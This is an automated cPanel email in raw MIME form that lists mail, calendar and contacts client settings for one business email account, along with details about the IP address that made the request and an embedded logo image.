--mixed-Cpanel::Email::Object-3140096-1726644806-0.561888666747986 Content-Type: multipart/alternative; boundary="alternative-Cpanel::Email::Object-3140096-1726644806-0.10170792754726" --alternative-Cpanel::Email::Object-3140096-1726644806-0.10170792754726 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Client Configuration settings for =E2=80=9Crudolph.perry@bloomingcostamices= .com=E2=80=9D. Mail Client Manual Settings --------------------------- Secure SSL/TLS Settings (Recommended) Username: rudolph.perry@bloomingcostamices.com Password: Use the email account=E2=80=99s password. Incoming Server: mgh-web11.maghost.ro * IMAP Port: 993 * POP3 Port: 995 Outgoing Server: mgh-web11.maghost.ro * SMTP Port: 465 IMAP, POP3, and SMTP require authentication. Non-SSL Settings (NOT Recommended) Username: rudolph.perry@bloomingcostamices.com Password: Use the email account=E2=80=99s password. Incoming Server: mail.bloomingcostamices.com * IMAP Port: 143 * POP3 Port: 110 Outgoing Server: mail.bloomingcostamices.com * SMTP Port: 587 IMAP, POP3, and SMTP require authentication. Calendar & Contacts Manual Settings ----------------------------------- Secure SSL/TLS Settings (Recommended). Username: rudolph.perry@bloomingcostamices.com Password: Use the email account=E2=80=99s password. Server: https://mgh-web11.maghost.ro:2080 * Port: 2080 Full Calendar URL(s): * cPanel CalDAV Calendar: * https://mgh-web11.maghost.ro:2080/calendars/rudolph.perry@bloomingcosta= mices.com/calendar Full Contact List URL(s): * cPanel CardDAV Address Book: * https://mgh-web11.maghost.ro:2080/addressbooks/rudolph.perry@bloomingco= stamices.com/addressbook Non-SSL Settings (NOT Recommended). Username: rudolph.perry@bloomingcostamices.com Password: Use the email account=E2=80=99s password. Server: http://mail.bloomingcostamices.com:2079 * Port: 2079 Full Calendar URL(s): * cPanel CalDAV Calendar: * http://mail.bloomingcostamices.com:2079/calendars/rudolph.perry@bloomin= gcostamices.com/calendar Full Contact List URL(s): * cPanel CardDAV Address Book: * http://mail.bloomingcostamices.com:2079/addressbooks/rudolph.perry@bloo= mingcostamices.com/addressbook A .mobileconfig file for use with iOS for iPhone/iPad/iPod and MacOS=C2=AE = Mail.app=C2=AE for Mountain Lion (10.8+) is attached to this message. This notice is the result of a request made by a computer with the IP addre= ss of =E2=80=9C27.7.199.144=E2=80=9D through the =E2=80=9Ccpanel=E2=80=9D s= ervice on the server. The remote computer=E2=80=99s location appears to be: India (IN). The remote computer=E2=80=99s IP address is assigned to the provider: =E2= =80=9CHATHWAY CABLE AND DATACOM LIMITED Hathway IP over Cable Internet Acce= ss=E2=80=9D The provider supplied the following remarks about the IP address allocation= : =E2=80=9C-------------------------------------------------------- To repo= rt network abuse, please contact mnt-irt For troubleshooting, please contac= t tech-c and admin-c Report invalid contact via www.apnic.net/invalidcontac= t --------------------------------------------------------=E2=80=9D The remote computer=E2=80=99s network link type appears to be: =E2=80=9CDSL= =E2=80=9D. The remote computer=E2=80=99s operating system appears to be: =E2=80=9CMac = OS X=E2=80=9D. The system generated this notice on Wednesday, September 18, 2024 at 7:33:2= 6 AM UTC. Do not reply to this automated message. cP Copyright=C2=A9 2024 cPanel, L.L.C.= --alternative-Cpanel::Email::Object-3140096-1726644806-0.10170792754726 Content-Type: multipart/related; boundary="related-Cpanel::Email::Object-3140096-1726644806-0.701349747714662" --related-Cpanel::Email::Object-3140096-1726644806-0.701349747714662 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable <body style=3D"background:#F4F4F4"> <div style=3D"margin:0;padding:0;background:#F4F4F4"> <table cellpadding=3D"10" cellspacing=3D"0" border=3D"0" width=3D"1= 00%" style=3D"width:0 auto;"> <tbody> <tr> <td align=3D"center"> <table cellpadding=3D"0" cellspacing=3D"0" border= =3D"0" width=3D"680" style=3D"border:0;width:0 auto;max-width:680px;"> <tbody> <tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 <td width=3D"680" height=3D"25" style= =3D"font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;font-size:16px;= color:#333333"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 Client Configuration settings f= or =E2=80=9Crudolph.perry@bloomingcostamices.com=E2=80=9D. =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 </td> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 </tr> <tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 <td style=3D"padding: 15px 0 20px 0; ba= ckground-color: #FFFFFF; border: 2px solid #E8E8E8; border-bottom: 2px soli= d #FF6C2C;"> <table width=3D"680" border=3D"0" c= ellpadding=3D"0" cellspacing=3D"0" style=3D"background:#FFFFFF;font-family:= 'Helvetica Neue',Helvetica,Arial,sans-serif;"> <tbody> <tr> <td width=3D"15"> </td> <td width=3D"650"> <table cellpadding= =3D"0" cellspacing=3D"0" border=3D"0" width=3D"100%"> <tbody> <tr> <td> <di= v id=3D"manual_settings_area" class=3D"section"> <h2 id=3D"hdrManualSettings">Mail Client Manual Settings</h2> =20=20=20=20=20=20=20=20 <div class=3D"row"> <div class=3D"col-md-6"> <div id=3D"ssl_settings_area" =20=20=20=20=20=20=20=20=20=20=20=20 style=3D"background-color: #fff; border: 1px solid transparent= ; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-bot= tom: 20px; border-color: #428bca;" =20=20=20=20=20=20=20=20=20=20=20=20 class=3D"preferred-selection panel panel-primary"> <div =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 style=3D"border-top-left-radius: 3px; border-top-right-radi= us: 3px; padding: 10px 15px; background-color: #428bca; border-color: #428b= ca; color: #fff;" =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 class=3D"panel-heading"> Secure <abbr title=3D"Secure Sockets Layer">SSL</abbr>/<abb= r title=3D"Transport Layer Security">TLS</abbr> Settings (Recommended) </div> <table class=3D"table manual_settings_table" style=3D"border-= collapse: collapse; border-spacing: 0; margin-bottom: 0; width: 100%; backg= round-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSSLSettingsAreaUsername">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSSLSettingsAreaUsername" class=3D"data wrap-text">rudolph.perry= @bloomingcostamices.com</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSettingsAreaPassword">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSettingsAreaPassword" class=3D"escape-note"> Use the email acco= unt=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSettingsAreaIncomingServer">Incoming Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSettingsAreaIncomingServer" class=3D"data">mgh-web11.maghost.ro <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Internet Message Access Proto= col" class=3D"initialism">IMAP</abbr> Port: 993</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Post Office Protocol 3" class= =3D"initialism">POP3</abbr> Port: 995</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblSettingsAreaOutgoingServer">Outgoing Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valSettingsAreaOutGoingServer" class=3D"data">mgh-web11.maghost.ro <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Simple Mail Transfer Protocol= ">SMTP</abbr> Port: 465</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" colspan=3D"2" class=3D"notes"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20 = <div id=3D"lblSettingsAreaSmallNote1" class=3D"small_note">IMAP, POP3,= and SMTP require authentication.</div> </td> </tr> </table> </div> </div> =20=20 </div> =20=20=20=20=20=20=20=20 <div class=3D"row" id=3D"nonSSL" style=3D"display: none"> <div class=3D"col-md-6"> <div id=3D"non_ssl_settings_area" =20=20=20=20=20=20=20=20=20=20=20=20 style=3D"background-color: #fff; border: 1px solid transparent= ; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-bot= tom: 20px; border-color: #f6c342;" =20=20=20=20=20=20=20=20=20=20=20=20 class=3D"panel panel-default panel-warning"> <div =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 style=3D"border-top-left-radius: 3px; border-top-right-radi= us: 3px; padding: 10px 15px; background-color: #fcf8e1; border-color: #f6c3= 42; color: #333;" =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 class=3D"panel-heading"> <span id=3D"descNonSSLSettings" class=3D"caption not-recomm= ended">Non-SSL Settings (NOT Recommended)</span> </div> <table id=3D"tblManualSettingsTable" class=3D"table manual_se= ttings_table" style=3D"border-collapse: collapse; border-spacing: 0; margin= -bottom: 0; width: 100%; background-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblNonSSLSettingsUsername">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valNonSSLSettingsUsername" class=3D"data wrap-text">rudolph.perry@= bloomingcostamices.com</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblNonSSLSettingsPassword">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valNonSSLSettingsPassword" class=3D"escape-note">Use the email acc= ount=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"lblNonSSLSettingsIncomingServer">Incoming Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"valNonSSLSettingsIncomingServer" class=3D"data">mail.bloomingcosta= mices.com <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Internet Message Access Proto= col" class=3D"initialism">IMAP</abbr> Port: 143</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Post Office Protocol 3" class= =3D"initialism">POP3</abbr> Port: 110</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"NonSSLSettingsOutgoingServer">Outgoing Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" id=3D"NonSSLSettingsOutgoingServerData" class=3D"data">mail.bloomingcost= amices.com <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><abbr title=3D"Simple Mail Transfer Protocol= ">SMTP</abbr> Port: 587</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" colspan=3D"2" class=3D"notes"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20 = <div id=3D"descNonSSLSettingsAuthenticationIsRequiredForIMAPPOP3SMTP1"= class=3D"small_note">IMAP, POP3, and SMTP require authentication.</div> </td> </tr> </table> </div> </div> </div> </div><div class=3D"section"> <h2>Calendar & Contacts Manual Settings</h2> <div class=3D"row"> =20=20=20=20=20=20=20=20=20 <div class=3D"col-md-6"> <div style=3D"background-color: #fff; border: 1px solid transpar= ent; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-= bottom: 20px; border-color: #428bca;" class=3D"preferred-selection panel pa= nel-primary"> <div style=3D"border-top-left-radius: 3px; border-top-right-= radius: 3px; padding: 10px 15px; background-color: #428bca; border-color: #= 428bca; color: #fff;" class=3D"panel-heading"> Secure <abbr title=3D"Secure Sockets Layer">SSL</abbr>/<abb= r title=3D"Transport Layer Security">TLS</abbr> Settings (Recommended). </div> <table class=3D"table manual_settings_table" style=3D"border-= collapse: collapse; border-spacing: 0; margin-bottom: 0; width: 100%; backg= round-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data wrap-text">rudolph.perry@bloomingcostamices.com</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"escape-note"> Use the email account=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data">https://mgh-web11.maghost.ro:2080 <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">Port: 2080</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Calendar URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CalDAV Calendar</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">https://mgh-web11.maghost.ro:2080/calendars/= rudolph.perry@bloomingcostamices.com/calendar</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Contact List URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CardDAV Address Book</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">https://mgh-web11.maghost.ro:2080/addressboo= ks/rudolph.perry@bloomingcostamices.com/addressbook</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 </table> </div> </div> =20=20=20=20=20=20=20=20=20 <div class=3D"col-md-6"> <div style=3D"background-color: #fff; border: 1px solid transpar= ent; border-radius: 4px; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); margin-= bottom: 20px; border-color: #f6c342;" class=3D"preferred-selection panel pa= nel-primary"> <div style=3D"border-top-left-radius: 3px; border-top-right-= radius: 3px; padding: 10px 15px; background-color: #fcf8e1; border-color: #= f6c342; color: #333;" class=3D"panel-heading"> Non-SSL Settings (NOT Recommended). </div> <table class=3D"table manual_settings_table" style=3D"border-= collapse: collapse; border-spacing: 0; margin-bottom: 0; width: 100%; backg= round-color: transparent; max-width: 100%;"> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Username:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data wrap-text">rudolph.perry@bloomingcostamices.com</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Password:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"escape-note"> Use the email account=E2=80=99s password.</td> </tr> <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Server:</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data">http://mail.bloomingcostamices.com:2079 <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">Port: 2079</li> </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Calendar URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CalDAV Calendar</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">http://mail.bloomingcostamices.com:2079/cale= ndars/rudolph.perry@bloomingcostamices.com/calendar</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <tr> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;">Full Contact List URL(s):</td> <td style=3D"border-top: 1px solid #ddd; padding: 8px= ;" class=3D"data"> <ul style=3D"margin-bottom: 10px; margin-top: 0; list= -style: outside none none; margin-left: -5px; padding-left: 0;" class=3D"port_list list-inline"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;"><b>cPanel CardDAV Address Book</b>:</li> <li style=3D"display: inline-block; padding-l= eft: 5px; padding-right: 5px;">http://mail.bloomingcostamices.com:2079/addr= essbooks/rudolph.perry@bloomingcostamices.com/addressbook</li> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20 </ul> </td> </tr> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 </table> </div> </div> =20=20=20=20=20=20=20=20=20 </div> </div> </div><p> A .mobileconfig file for use with iOS for iPhone/iPad/iPod and MacOS=C2=AE= Mail.app=C2=AE for Mountain Lion (10.8+) is attached to this message. </p> </td> </tr> <tr> <td> <di= v style=3D"font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;border-t= op: 2px solid #E8E8E8; padding-top:5px; margin-top: 5px; font-size:12px; co= lor: #666666;"> <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> =20=20=20=20=20=20=20=20 This notice is the result of a request made by a computer with th= e <abbr title=3D"Internet Protocol">IP</abbr> address of =E2=80=9C27.7.199.= 144=E2=80=9D through the =E2=80=9Ccpanel=E2=80=9D service on the server. =20=20=20=20=20=20=20=20 </p> <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The remote computer=E2=80=99s location appears = to be: India (IN). </p> =20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The remote computer=E2=80=99s <abbr title=3D"Internet Pro= tocol">IP</abbr> address is assigned to the provider: =E2=80=9CHATHWAY CABL= E AND DATACOM LIMITED Hathway IP over Cable Internet Access=E2=80=9D </p> =20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The provider supplied the following remarks about the <ab= br title=3D"Internet Protocol">IP</abbr> address allocation: =E2=80=9C-----= --------------------------------------------------- To report network abuse= , please contact mnt-irt For troubleshooting, please contact tech-c and adm= in-c Report invalid contact via www.apnic.net/invalidcontact --------------= ------------------------------------------=E2=80=9D </p> =20=20=20=20=20=20=20=20=20=20=20=20 =20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;= "> The remote computer=E2=80=99s network link type appears to be: = =E2=80=9CDSL=E2=80=9D. </p> <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> =20=20=20=20=20=20=20=20=20=20 The remote computer=E2=80=99s operating system appears to be: = =E2=80=9CMac OS X=E2=80=9D. =20=20=20=20=20=20=20=20=20=20 </p> =20=20=20=20=20=20=20=20=20=20 <p style=3D"padding:0 0 0 0; margin: 5px 0 0 0;"> The system generated this notice on Wednesday, September 18, 2024 a= t 7:33:26 AM UTC. </p> </div>=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 = <!-- --> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20 <p> Do not reply to this automated message. </p> </td> </tr> </tbody> </table> </td> <td width=3D"15"> </td> </tr> </tbody> </table> </td> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 </tr> <tr> <td align=3D"center" style=3D"padding-t= op: 10px;"> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 <img src=3D"cid:auto_cid_1826004190= " height=3D"25" width=3D"25" style=3D"border:0;line-height:100%;border:0" a= lt=3D"cP"> <p style=3D"font-family:'Helvetica = Neue',Helvetica,Arial,sans-serif;font-size:12px;color:#666666; padding: 0; = margin: 0;">Copyright=C2=A9=C2=A02024 cPanel, L.L.C.<p> =20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20 </td> </tr> </tbody> </table> </td> </tr> </tbody> </table> </div> </body>= --related-Cpanel::Email::Object-3140096-1726644806-0.701349747714662 Content-Type: image/png; x-unix-mode=0600; name="cpanel-logo-tiny.png" Content-Disposition: attachment; filename="cpanel-logo-tiny.png" Content-ID: <auto_cid_1826004190> Content-Transfer-Encoding: base64 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 